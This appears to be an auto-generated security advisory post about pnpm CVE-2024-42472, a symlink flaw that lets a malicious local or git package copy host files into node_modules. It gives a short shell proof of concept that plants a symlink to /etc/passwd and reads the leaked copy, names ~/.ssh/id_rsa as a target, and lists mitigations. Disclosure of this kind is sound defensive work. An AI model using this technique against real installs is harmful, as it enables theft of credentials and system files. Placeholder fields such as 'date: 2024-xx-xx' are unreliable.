pnpm (Nodejs), Symlink Arbitrary File Read, CVE-2024-42472 (High)

Listen to this Post

How the CVE Works:

The vulnerability is located in the `store/cafs/src/addFilesFromDir.ts` module of pnpm. When installing a local directory (file:) or git dependency, pnpm’s file-copying routine traverses the package directory. It uses `fs.statSync()` and `fs.readFileSync()` to gather and read files. These Node.js functions inherently follow symbolic links. The code does not validate if the final resolved path of a symlink remains within the boundaries of the source package directory. Therefore, a malicious package can contain a symlink pointing to an absolute path outside its root, such as `/etc/passwd` or ~/.ssh/id_rsa. During installation, pnpm will blindly follow this symlink, read the target file’s contents, and write a copy of that sensitive host system file into the project’s `node_modules` directory, leading to local file disclosure.

dailycve form:

Platform: pnpm (Node.js)
Version: <= 8.15.x
Vulnerability : Symlink Arbitrary File Read
Severity: High
date: 2024-xx-xx

Prediction: 2024-10-15

What Undercode Say:

Analytics:

mkdir -p /tmp/evil && cd /tmp/evil
ln -s /etc/passwd leaked.txt
echo '{"name":"evil","version":"1.0.0"}' > package.json
mkdir /tmp/victim && cd /tmp/victim
pnpm init && pnpm add file:../evil
cat node_modules/evil/leaked.txt

Exploit:

Malicious package creation.

Symlink to host file.

Victim installs dependency.

Sensitive file copied.

Protection from this CVE:

Use `fs.lstatSync()`.

Validate resolved path.

Restrict to package root.

Impact:

Credential theft.

Local file leakage.

CI/CD compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top